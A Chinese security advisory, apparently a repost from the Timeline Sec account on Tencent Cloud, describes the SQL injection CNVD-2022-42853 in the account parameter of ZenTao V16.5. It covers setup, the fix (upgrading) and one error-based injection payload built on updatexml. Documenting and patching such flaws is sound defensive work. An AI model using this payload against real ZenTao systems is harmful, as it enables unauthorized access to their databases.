前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CNVD-2022-42853:禅道V16.5SQL注入漏洞

CNVD-2022-42853:禅道V16.5SQL注入漏洞

作者头像
Timeline Sec
发布2022-12-30 09:33:58
1.7K0
发布2022-12-30 09:33:58
举报
文章被收录于专栏:Timeline SecTimeline Sec

上方蓝色字体关注我们,一起学安全!

作者:bnlbnf@Timeline Sec

本文字数:619

阅读时长:2~3min

声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

禅道由青岛易软天创网络科技有限公司开发,国产开源项目管理软件。

它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。

禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。

0x02 漏洞概述

禅道V16.5未对输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行。

0x03 影响版本

禅道V16.5

0x04 环境搭建

下载一键安装包

代码语言:javascript
复制
https://www.zentao.net/download/zentaopms16.5-80656.html

启动,然后访问

0x05 漏洞复现

报错型注入payload:

代码语言:javascript
复制
admin' and updatexml(1,concat(0x7e,(123=123),0x7e),1) and '1'='1

0x06 修复方式

升级最新版本

https://www.zentao.net

代码语言:javascript
复制
参考链接:

https://www.cnblogs.com/spmonkey/articles/16611302.html

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-11-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
项目管理
CODING 项目管理(CODING Project Management,CODING-PM)工具包含迭代管理、需求管理、任务管理、缺陷管理、文件/wiki 等功能,适用于研发团队进行项目管理或敏捷开发实践。结合敏捷研发理念,帮助您对产品进行迭代规划,让每个迭代中的需求、任务、缺陷无障碍沟通流转, 让项目开发过程风险可控,达到可持续性快速迭代。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档